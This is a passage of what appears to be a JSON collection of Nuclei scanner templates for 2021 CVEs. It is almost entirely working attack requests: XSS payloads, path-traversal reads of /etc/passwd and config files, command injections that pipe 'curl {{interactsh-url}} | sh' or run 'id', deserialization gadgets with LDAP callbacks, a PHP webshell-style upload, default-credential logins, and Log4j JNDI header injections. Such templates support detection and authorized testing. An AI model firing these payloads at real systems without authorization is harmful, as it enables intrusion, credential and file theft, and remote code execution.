{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","internal":true,"words":["IBM WebSphere Portal"]}]},{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-35395","info":{"name":"RealTek Jungle SDK - Arbitrary Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/formWsc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Stop Spammers Spam Prevention","Tags:"],"condition":"and"}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Simple Giveaways"]}]},{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Pie Register","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/"],"condition":"and"}]},{"raw":["GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer 